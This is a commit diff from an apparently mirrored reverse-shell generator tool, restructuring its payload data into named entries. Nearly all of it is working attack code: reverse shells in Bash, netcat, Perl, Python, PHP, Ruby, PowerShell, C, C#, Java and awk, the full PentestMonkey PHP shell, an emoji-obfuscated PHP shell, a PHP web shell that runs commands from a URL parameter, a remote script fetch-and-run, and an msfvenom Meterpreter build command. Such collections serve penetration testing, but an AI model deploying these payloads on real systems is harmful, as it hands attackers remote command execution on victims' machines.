mirror of
synced 2025-02-20 13:46:02 +00:00
more fixes
This commit is contained in:
@ -374,7 +374,7 @@
document.querySelector("#os-options").addEventListener("change", (event) => {
const selectedOS = event.target.value;
const data = rsgData.commands;
const data = rsgData.reverseShellCommands;
const filteredItems = data.filter(item => {
if (selectedOS !== "all") {
@ -410,8 +410,8 @@
getPort: () => Number(portInput.value || portInput.getAttribute('placeholder')),
getReverseShellCommand: () => {
const reverseShellData = rsgData.reverseShellsCommands.filter((reverseShellData) => reverseShellData[0] === rsg.currentCommandType)[0];
return reverseShellData[1]
const reverseShellData = rsgData.reverseShellCommands.find((item) => item.name === rsg.currentCommandType);
return reverseShellData.command;
highlightParameters: (text, encoder) => {
@ -470,7 +470,7 @@
// })
// },
initReverseShellSelection: (items = rsgData.commands) => {
initReverseShellSelection: (items = rsgData.reverseShellCommands) => {
items.map((item, index) => {
const { name, command } = item;
@ -592,7 +592,7 @@
encodingSelect.addEventListener("change", dropdownUpdate);
document.querySelector('#inc-port').addEventListener('click', () => {
portInput.val(rsg.getPort() + 1);
portInput.value = rsg.getPort() + 1;
setLocalStorage(portInput, "port", "value");
@ -722,4 +722,4 @@
@ -2,7 +2,7 @@ const rsgData = {
listenerCommands: [
['nc', 'nc -lvnp {port}'],
['rlwrap + nc', 'rlwrap nc -lvnp {port}'],
['rlwrap + nc', 'rlwrap -cAr nc -lvnp {port}'],
['pwncat', 'python3 -m pwncat -lp {port}'],
['windows ConPty', 'stty raw -echo; (stty size; cat) | nc -lvnp {port}'],
['socat', 'socat -d -d TCP-LISTEN:{port} STDOUT'],
@ -10,68 +10,219 @@ const rsgData = {
['powercat', 'powercat -l -p {port}']
shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh'],
shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh'],
upgrade: ['python', ],
//C shell needs fixed
reverseShellsCommands: [
['Bash -i', '{shell} -i >& /dev/tcp/{ip}/{port} 0>&1'],
['Bash 196', '0<&196;exec 196<>/dev/tcp/{ip}/{port}; {shell} <&196 >&196 2>&196'],
['Bash read line', 'exec 5<>/dev/tcp/{ip}/{port};cat <&5 | while read line; do $line 2>&5 >&5; done'],
['Bash 5', '{shell} -i 5<> /dev/tcp/{ip}/{port} 0<&5 1>&5 2>&5'],
['Bash udp', '{shell} -i >& /dev/udp/{ip}/{port} 0>&1'],
['C', '#include <stdio.h\>\n#include <sys\/socket.h\>\n#include <sys\/types.h\>\n#include <stdlib.h\>\n#include <unistd.h>\n#include <netinet/in.h\>\n#include <arpa/inet.h\>\n\nint main(void){\n int port = {port};\n struct sockaddr_in revsockaddr;\n\n int sockt = socket(AF_INET, SOCK_STREAM, 0);\n revsockaddr.sin_family = AF_INET; \n revsockaddr.sin_port = htons(port);\n revsockaddr.sin_addr.s_addr = inet_addr("{ip}");\n\n connect(sockt, (struct sockaddr *) &revsockaddr, \n sizeof(revsockaddr));\n dup2(sockt, 0);\n dup2(sockt, 1);\n dup2(sockt, 2);\n\n char * const argv[] = {"{shell}", NULL};\n execve("{shell}", argv, NULL);\n\n return 0; \n}'],
['C#', 'using System;\nusing System.Text;\nusing System.IO;\nusing System.Diagnostics;\nusing System.ComponentModel;\nusing System.Linq;\nusing System.Net;\nusing System.Net.Sockets;\n\n\nnamespace ConnectBack\n{\n public class Program\n {\n static StreamWriter streamWriter;\n\n public static void Main(string[] args)\n {\n using(TcpClient client = new TcpClient("", 443))\n {\n using(Stream stream = client.GetStream())\n {\n using(StreamReader rdr = new StreamReader(stream))\n {\n streamWriter = new StreamWriter(stream);\n \n StringBuilder strInput = new StringBuilder();\n\n Process p = new Process();\n p.StartInfo.FileName = "cmd.exe";\n p.StartInfo.CreateNoWindow = true;\n p.StartInfo.UseShellExecute = false;\n p.StartInfo.RedirectStandardOutput = true;\n p.StartInfo.RedirectStandardInput = true;\n p.StartInfo.RedirectStandardError = true;\n p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);\n p.Start();\n p.BeginOutputReadLine();\n\n while(true)\n {\n strInput.Append(rdr.ReadLine());\n //strInput.Append("\\n");\n p.StandardInput.WriteLine(strInput);\n strInput.Remove(0, strInput.Length);\n }\n }\n }\n }\n }\n\n private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)\n {\n StringBuilder strOutput = new StringBuilder();\n\n if (!String.IsNullOrEmpty(outLine.Data))\n {\n try\n {\n strOutput.Append(outLine.Data);\n streamWriter.WriteLine(strOutput);\n streamWriter.Flush();\n }\n catch (Exception err) { }\n }\n }\n\n }\n}'],
['nc mkfifo', 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|nc {ip} {port} >/tmp/f'],
['nc -e', 'nc -e {shell} {ip} {port}'],
['nc -c', 'nc -c {shell} {ip} {port}'],
['ncat -e', 'ncat {ip} {port} -e {shell} '],
['ncat udp', 'ncat {ip} {port} -e {shell}'],
['Emoji PHP', 'php -r \'$😀="1";$😁="2";$😅="3";$😆="4";$😉="5";$😊="6";$😎="7";$😍="8";$😚="9";$🙂="0";$🤢=" ";$🤓="<";$🤠=">";$😱="-";$😵="&";$🤩="i";$🤔=".";$🤨="/";$🥰="a";$😐="b";$😶="i";$🙄="h";$😂="c";$🤣="d";$😃="e";$😄="f";$😋="k";$😘="n";$😗="o";$😙="p";$🤗="s";$😑="x";$💀 = $😄. $🤗. $😗. $😂. $😋. $😗. $😙. $😃. $😘;$🚀 = "{ip}";$💻 = {port};$🐚 = "{shell}". $🤢. $😱. $🤩. $🤢. $🤓. $😵. $😅. $🤢. $🤠. $😵. $😅. $🤢. $😁. $🤠. $😵. $😅;$🤣 = $💀($🚀,$💻);$👽 = $😃. $😑. $😃. $😂;$👽($🐚);\''],
['Perl', 'perl -e \'use Socket;$i="{ip}";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("{shell} -i");};\''],
['Perl no sh', 'perl -MIO -e \'$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"{port}:{port}");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\''],
['PHP PentestMonkey', '<?php\n\/\/ php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https:\/\/raw.githubusercontent.com\/pentestmonkey\/php-reverse-shell\/master\/php-reverse-shell.php\n\/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\nset_time_limit (0);\n$VERSION = \"1.0\";\n$ip = \'{ip}\';\n$port = {port};\n$chunk_size = 1400;\n$write_a = null;\n$error_a = null;\n$shell = \'uname -a; w; id; {shell} -i\';\n$daemon = 0;\n$debug = 0;\n\nif (function_exists(\'pcntl_fork\')) {\n $pid = pcntl_fork();\n \n if ($pid == -1) {\n printit(\"ERROR: Can\'t fork\");\n exit(1);\n }\n \n if ($pid) {\n exit(0); \/\/ Parent exits\n }\n if (posix_setsid() == -1) {\n printit(\"Error: Can\'t setsid()\");\n exit(1);\n }\n\n $daemon = 1;\n} else {\n printit(\"WARNING: Failed to daemonise. This is quite common and not fatal.\");\n}\n\nchdir(\"\/\");\n\numask(0);\n\n\/\/ Open reverse connection\n$sock = fsockopen($ip, $port, $errno, $errstr, 30);\nif (!$sock) {\n printit(\"$errstr ($errno)\");\n exit(1);\n}\n\n$descriptorspec = array(\n 0 => array(\"pipe\", \"r\"), \/\/ stdin is a pipe that the child will read from\n 1 => array(\"pipe\", \"w\"), \/\/ stdout is a pipe that the child will write to\n 2 => array(\"pipe\", \"w\") \/\/ stderr is a pipe that the child will write to\n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n printit(\"ERROR: Can\'t spawn shell\");\n exit(1);\n}\n\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\nprintit(\"Successfully opened reverse shell to $ip:$port\");\n\nwhile (1) {\n if (feof($sock)) {\n printit(\"ERROR: Shell connection terminated\");\n break;\n }\n\n if (feof($pipes[1])) {\n printit(\"ERROR: Shell process terminated\");\n break;\n }\n\n $read_a = array($sock, $pipes[1], $pipes[2]);\n $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n if (in_array($sock, $read_a)) {\n if ($debug) printit(\"SOCK READ\");\n $input = fread($sock, $chunk_size);\n if ($debug) printit(\"SOCK: $input\");\n fwrite($pipes[0], $input);\n }\n\n if (in_array($pipes[1], $read_a)) {\n if ($debug) printit(\"STDOUT READ\");\n $input = fread($pipes[1], $chunk_size);\n if ($debug) printit(\"STDOUT: $input\");\n fwrite($sock, $input);\n }\n\n if (in_array($pipes[2], $read_a)) {\n if ($debug) printit(\"STDERR READ\");\n $input = fread($pipes[2], $chunk_size);\n if ($debug) printit(\"STDERR: $input\");\n fwrite($sock, $input);\n }\n}\n\nfclose($sock);\nfclose($pipes[0]);\nfclose($pipes[1]);\nfclose($pipes[2]);\nproc_close($process);\n\nfunction printit ($string) {\n if (!$daemon) {\n print \"$string\\n\";\n }\n}\n\n?>'],
['PHP exec', 'php -r \'$sock=fsockopen("{ip}",{port});exec("{shell} -i <&3 >&3 2>&3");\''],
['PHP shell_exec', 'php -r \'$sock=fsockopen("{ip}",{port});shell_exec("{shell} -i <&3 >&3 2>&3");\''],
['PHP system', 'php -r \'$sock=fsockopen("{ip}",{port});system("{shell} -i <&3 >&3 2>&3");\''],
['PHP passthru', 'php -r \'$sock=fsockopen("{ip}",{port});passthru("{shell} -i <&3 >&3 2>&3");\''],
['PHP `', 'php -r \'$sock=fsockopen("{ip}",{port});`{shell} -i <&3 >&3 2>&3`;\''],
['PHP popen', 'php -r \'$sock=fsockopen("{ip}",{port});popen("{shell} -i <&3 >&3 2>&3", "r");\''],
['Windows ConPty', 'IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {ip} {port}'],
['PowerShell #1', 'powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("{ip}",{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'],
['PowerShell #2', 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\'{ip}\',{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"'],
['PowerShell #3 (Base64)', undefined],
['Python #1', 'export RHOST="{ip}";export RPORT={port};python -c \'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("{shell}")\''],
['Python #2', 'python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("{shell}")\''],
['Ruby #1', 'ruby -rsocket -e\'f=TCPSocket.open("{ip}",{port}).to_i;exec sprintf("{shell} -i <&%d >&%d 2>&%d",f,f,f)\''],
['Ruby no sh', 'ruby -rsocket -e \'exit if fork;c=TCPSocket.new("{ip}","{port}");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end\''],
['socat #1', 'socat TCP:{ip}:{port} EXEC:{shell}'],
['socat #2 (TTY)', 'socat TCP:{ip}:{port} EXEC:\'{shell}\',pty,stderr,setsid,sigint,sane'],
['awk', 'awk \'BEGIN {s = "/inet/tcp/0/{ip}/{port}"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}\' /dev/null'],
['node.js', 'require(\'child_process\').exec(\'nc -e {shell} {ip} {port}\')'],
['Java #1','import java.io.BufferedReader;\nimport java.io.InputStreamReader;\n\npublic class shell {\n public static void main(String args[]) {\n String s;\n Process p;\n try {\n p = Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/{ip}/{port} 0>&1");\n p.waitFor();\n p.destroy();\n } catch (Exception e) {}\n }\n}'],
['Haskell #1','module Main where\n\nimport System.Process\n\nmain = callCommand "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | {shell} -i 2>&1 | nc {ip} {port} >/tmp/f"'],
['telnet', 'TF=$(mktemp -u);mkfifo $TF && telnet {ip} {port} 0<$TF | {shell} 1>$TF'],
specialCommands: {
'PowerShell payload': '$client = New-Object System.Net.Sockets.TCPClient("{ip}",{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
commands: [
reverseShellCommands: [
name: 'Bash -i',
command: '{shell} -i >& /dev/tcp/{ip}/{port} 0>&1',
meta: ['linux', 'windows', 'mac']
"name": "Bash -i",
"command": "{shell} -i >& /dev/tcp/{ip}/{port} 0>&1",
"meta": ["linux", "mac"]
name: 'Bash 196',
command: '0<&196;exec 196<>/dev/tcp/{ip}/{port}; {shell} <&196 >&196 2>&196',
meta: ['windows', 'mac']
name: 'Bash read line',
command: 'exec 5<>/dev/tcp/{ip}/{port};cat <&5 | while read line; do $line 2>&5 >&5; done',
meta: ['linux', 'mac']
"name": "Bash 196",
"command": "0<&196;exec 196<>/dev/tcp/{ip}/{port}; {shell} <&196 >&196 2>&196",
"meta": ["linux", "mac"]
"name": "Bash read line",
"command": "exec 5<>/dev/tcp/{ip}/{port};cat <&5 | while read line; do $line 2>&5 >&5; done",
"meta": ["linux", "mac"]
"name": "Bash 5",
"command": "{shell} -i 5<> /dev/tcp/{ip}/{port} 0<&5 1>&5 2>&5",
"meta": ["linux", "mac"]
"name": "Bash udp",
"command": "{shell} -i >& /dev/udp/{ip}/{port} 0>&1",
"meta": ["linux", "mac"]
"name": "C",
"command": "#include <stdio.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n\nint main(void){\n int port = {port};\n struct sockaddr_in revsockaddr;\n\n int sockt = socket(AF_INET, SOCK_STREAM, 0);\n revsockaddr.sin_family = AF_INET; \n revsockaddr.sin_port = htons(port);\n revsockaddr.sin_addr.s_addr = inet_addr(\"{ip}\");\n\n connect(sockt, (struct sockaddr *) &revsockaddr, \n sizeof(revsockaddr));\n dup2(sockt, 0);\n dup2(sockt, 1);\n dup2(sockt, 2);\n\n char * const argv[] = {\"{shell}\", NULL};\n execve(\"{shell}\", argv, NULL);\n\n return 0; \n}",
"meta": ["linux", "windows", "mac"]
"name": "C#",
"command": "using System;\nusing System.Text;\nusing System.IO;\nusing System.Diagnostics;\nusing System.ComponentModel;\nusing System.Linq;\nusing System.Net;\nusing System.Net.Sockets;\n\n\nnamespace ConnectBack\n{\n\tpublic class Program\n\t{\n\t\tstatic StreamWriter streamWriter;\n\n\t\tpublic static void Main(string[] args)\n\t\t{\n\t\t\tusing(TcpClient client = new TcpClient(\"\", 443))\n\t\t\t{\n\t\t\t\tusing(Stream stream = client.GetStream())\n\t\t\t\t{\n\t\t\t\t\tusing(StreamReader rdr = new StreamReader(stream))\n\t\t\t\t\t{\n\t\t\t\t\t\tstreamWriter = new StreamWriter(stream);\n\t\t\t\t\t\t\n\t\t\t\t\t\tStringBuilder strInput = new StringBuilder();\n\n\t\t\t\t\t\tProcess p = new Process();\n\t\t\t\t\t\tp.StartInfo.FileName = \"cmd.exe\";\n\t\t\t\t\t\tp.StartInfo.CreateNoWindow = true;\n\t\t\t\t\t\tp.StartInfo.UseShellExecute = false;\n\t\t\t\t\t\tp.StartInfo.RedirectStandardOutput = true;\n\t\t\t\t\t\tp.StartInfo.RedirectStandardInput = true;\n\t\t\t\t\t\tp.StartInfo.RedirectStandardError = true;\n\t\t\t\t\t\tp.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);\n\t\t\t\t\t\tp.Start();\n\t\t\t\t\t\tp.BeginOutputReadLine();\n\n\t\t\t\t\t\twhile(true)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tstrInput.Append(rdr.ReadLine());\n\t\t\t\t\t\t\t//strInput.Append(\"\\n\");\n\t\t\t\t\t\t\tp.StandardInput.WriteLine(strInput);\n\t\t\t\t\t\t\tstrInput.Remove(0, strInput.Length);\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tprivate static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)\n {\n StringBuilder strOutput = new StringBuilder();\n\n if (!String.IsNullOrEmpty(outLine.Data))\n {\n try\n {\n strOutput.Append(outLine.Data);\n streamWriter.WriteLine(strOutput);\n streamWriter.Flush();\n }\n catch (Exception err) { }\n }\n }\n\n\t}\n}",
"meta": ["linux", "windows", "mac"]
"name": "nc mkfifo",
"command": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|nc {ip} {port} >/tmp/f",
"meta": ["linux", "mac"]
"name": "nc -e",
"command": "nc -e {shell} {ip} {port}",
"meta": ["linux", "windows", "mac"]
"name": "nc -c",
"command": "nc -c {shell} {ip} {port}",
"meta": ["linux", "windows", "mac"]
"name": "ncat -e",
"command": "ncat {ip} {port} -e {shell} ",
"meta": ["linux", "mac"]
"name": "ncat udp",
"command": "ncat {ip} {port} -e {shell}",
"meta": ["linux", "mac"]
"name": "Emoji PHP",
"command": "php -r '$😀=\"1\";$😁=\"2\";$😅=\"3\";$😆=\"4\";$😉=\"5\";$😊=\"6\";$😎=\"7\";$😍=\"8\";$😚=\"9\";$🙂=\"0\";$🤢=\" \";$🤓=\"<\";$🤠=\">\";$😱=\"-\";$😵=\"&\";$🤩=\"i\";$🤔=\".\";$🤨=\"/\";$🥰=\"a\";$😐=\"b\";$😶=\"i\";$🙄=\"h\";$😂=\"c\";$🤣=\"d\";$😃=\"e\";$😄=\"f\";$😋=\"k\";$😘=\"n\";$😗=\"o\";$😙=\"p\";$🤗=\"s\";$😑=\"x\";$💀 = $😄. $🤗. $😗. $😂. $😋. $😗. $😙. $😃. $😘;$🚀 = \"{ip}\";$💻 = {port};$🐚 = \"{shell}\". $🤢. $😱. $🤩. $🤢. $🤓. $😵. $😅. $🤢. $🤠. $😵. $😅. $🤢. $😁. $🤠. $😵. $😅;$🤣 = $💀($🚀,$💻);$👽 = $😃. $😑. $😃. $😂;$👽($🐚);'",
"meta": ["linux", "windows", "mac"]
"name": "Perl",
"command": "perl -e 'use Socket;$i=\"{ip}\";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"{shell} -i\");};'",
"meta": ["linux", "windows", "mac"]
"name": "Perl no sh",
"command": "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"{port}:{port}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'",
"meta": ["linux", "windows", "mac"]
"name": "PHP PentestMonkey",
"command": "<?php\n// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php\n// Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\nset_time_limit (0);\n$VERSION = \"1.0\";\n$ip = '{ip}';\n$port = {port};\n$chunk_size = 1400;\n$write_a = null;\n$error_a = null;\n$shell = 'uname -a; w; id; {shell} -i';\n$daemon = 0;\n$debug = 0;\n\nif (function_exists('pcntl_fork')) {\n\t$pid = pcntl_fork();\n\t\n\tif ($pid == -1) {\n\t\tprintit(\"ERROR: Can't fork\");\n\t\texit(1);\n\t}\n\t\n\tif ($pid) {\n\t\texit(0); // Parent exits\n\t}\n\tif (posix_setsid() == -1) {\n\t\tprintit(\"Error: Can't setsid()\");\n\t\texit(1);\n\t}\n\n\t$daemon = 1;\n} else {\n\tprintit(\"WARNING: Failed to daemonise. This is quite common and not fatal.\");\n}\n\nchdir(\"/\");\n\numask(0);\n\n// Open reverse connection\n$sock = fsockopen($ip, $port, $errno, $errstr, 30);\nif (!$sock) {\n\tprintit(\"$errstr ($errno)\");\n\texit(1);\n}\n\n$descriptorspec = array(\n 0 => array(\"pipe\", \"r\"), // stdin is a pipe that the child will read from\n 1 => array(\"pipe\", \"w\"), // stdout is a pipe that the child will write to\n 2 => array(\"pipe\", \"w\") // stderr is a pipe that the child will write to\n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n\tprintit(\"ERROR: Can't spawn shell\");\n\texit(1);\n}\n\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\nprintit(\"Successfully opened reverse shell to $ip:$port\");\n\nwhile (1) {\n\tif (feof($sock)) {\n\t\tprintit(\"ERROR: Shell connection terminated\");\n\t\tbreak;\n\t}\n\n\tif (feof($pipes[1])) {\n\t\tprintit(\"ERROR: Shell process terminated\");\n\t\tbreak;\n\t}\n\n\t$read_a = array($sock, $pipes[1], $pipes[2]);\n\t$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n\tif (in_array($sock, $read_a)) {\n\t\tif ($debug) printit(\"SOCK READ\");\n\t\t$input = fread($sock, $chunk_size);\n\t\tif ($debug) printit(\"SOCK: $input\");\n\t\tfwrite($pipes[0], $input);\n\t}\n\n\tif (in_array($pipes[1], $read_a)) {\n\t\tif ($debug) printit(\"STDOUT READ\");\n\t\t$input = fread($pipes[1], $chunk_size);\n\t\tif ($debug) printit(\"STDOUT: $input\");\n\t\tfwrite($sock, $input);\n\t}\n\n\tif (in_array($pipes[2], $read_a)) {\n\t\tif ($debug) printit(\"STDERR READ\");\n\t\t$input = fread($pipes[2], $chunk_size);\n\t\tif ($debug) printit(\"STDERR: $input\");\n\t\tfwrite($sock, $input);\n\t}\n}\n\nfclose($sock);\nfclose($pipes[0]);\nfclose($pipes[1]);\nfclose($pipes[2]);\nproc_close($process);\n\nfunction printit ($string) {\n\tif (!$daemon) {\n\t\tprint \"$string\\n\";\n\t}\n}\n\n?>",
"meta": ["linux", "windows", "mac"]
// fix
"name": "PHP cmd",
"command": "<html>\n<body>\n<form method=\"GET\" name=\"<?php echo basename($_SERVER[\'PHP_SELF\']); ?>\">\n<input type=\"TEXT\" name=\"cmd\" id=\"cmd\" size=\"80\">\n<input type=\"SUBMIT\" value=\"Execute\">\n<\/form>\n<pre>\n<?php\n if(isset($_GET[\'cmd\']))\n {\n system($_GET[\'cmd\']);\n }\n?>\n<\/pre>\n<\/body>\n<script>document.getElementById(\"cmd\").focus();<\/script>\n<\/html>",
"meta": ["linux", "windows", "mac"]
"name": "PHP exec",
"command": "php -r '$sock=fsockopen(\"{ip}\",{port});exec(\"{shell} <&3 >&3 2>&3\");'",
"meta": ["linux",, "mac"]
"name": "PHP shell_exec",
"command": "php -r '$sock=fsockopen(\"{ip}\",{port});shell_exec(\"{shell} <&3 >&3 2>&3\");'",
"meta": ["linux", "mac"]
"name": "PHP system",
"command": "php -r '$sock=fsockopen(\"{ip}\",{port});system(\"{shell} <&3 >&3 2>&3\");'",
"meta": ["linux", "mac"]
"name": "PHP passthru",
"command": "php -r '$sock=fsockopen(\"{ip}\",{port});passthru(\"{shell} <&3 >&3 2>&3\");'",
"meta": ["linux", "mac"]
"name": "PHP `",
"command": "php -r '$sock=fsockopen(\"{ip}\",{port});`{shell} <&3 >&3 2>&3`;'",
"meta": ["linux", "windows", "mac"]
"name": "PHP popen",
"command": "php -r '$sock=fsockopen(\"{ip}\",{port});popen(\"{shell} <&3 >&3 2>&3\", \"r\");'",
"meta": ["linux", "windows", "mac"]
"name": "Windows ConPty",
"command": "IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {ip} {port}",
"meta": []
"name": "PowerShell #1",
"command": "powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"{ip}\",{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()",
"meta": []
"name": "PowerShell #2",
"command": "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('{ip}',{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"",
"meta": []
"name": "PowerShell #3 (Base64)",
"meta": []
"name": "Python #1",
"command": "export RHOST=\"{ip}\";export RPORT={port};python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"{shell}\")'",
"meta": []
"name": "Python #2",
"command": "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{ip}\",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"{shell}\")'",
"meta": []
"name": "Ruby #1",
"command": "ruby -rsocket -e'f=TCPSocket.open(\"{ip}\",{port}).to_i;exec sprintf(\"{shell} -i <&%d >&%d 2>&%d\",f,f,f)'",
"meta": []
"name": "Ruby no sh",
"command": "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"{ip}\",\"{port}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'",
"meta": []
"name": "socat #1",
"command": "socat TCP:{ip}:{port} EXEC:{shell}",
"meta": []
"name": "socat #2 (TTY)",
"command": "socat TCP:{ip}:{port} EXEC:'{shell}',pty,stderr,setsid,sigint,sane",
"meta": []
"name": "awk",
"command": "awk 'BEGIN {s = \"/inet/tcp/0/{ip}/{port}\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null",
"meta": []
"name": "node.js",
"command": "require('child_process').exec('nc -e {shell} {ip} {port}')",
"meta": []
"name": "Java #1",
"command": "import java.io.BufferedReader;\nimport java.io.InputStreamReader;\n\npublic class shell {\n public static void main(String args[]) {\n String s;\n Process p;\n try {\n p = Runtime.getRuntime().exec(\"bash -c $@|bash 0 echo bash -i >& /dev/tcp/{ip}/{port} 0>&1\");\n p.waitFor();\n p.destroy();\n } catch (Exception e) {}\n }\n}",
"meta": []
"name": "Haskell #1",
"command": "module Main where\n\nimport System.Process\n\nmain = callCommand \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | {shell} -i 2>&1 | nc {ip} {port} >/tmp/f\"",
"meta": []
"name": "telnet",
"command": "TF=$(mktemp -u);mkfifo $TF && telnet {ip} {port} 0<$TF | {shell} 1>$TF",
"meta": []
// testing.. need to move into MSFVenom. Another aray...?
"name": "Windows Meterpreter Staged Reverse TCP",
"command": "msfvenom -p windows/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f exe > reverse.exe",
"meta": ["msfvenom", "windows", "meterpreter", "reverse"]
// msfvenom: [{
// "name": "Windows Meterpreter Staged Reverse TCP",
// "command": "msfvenom -p windows/meterpreter/reverse_tcp LHOST={IP} LPORT={port} -f exe > reverse.exe",
// "meta": ["msfvenom", "windows", "meterpreter", "reverse"]
// },
// ],
Reference in New Issue
Block a user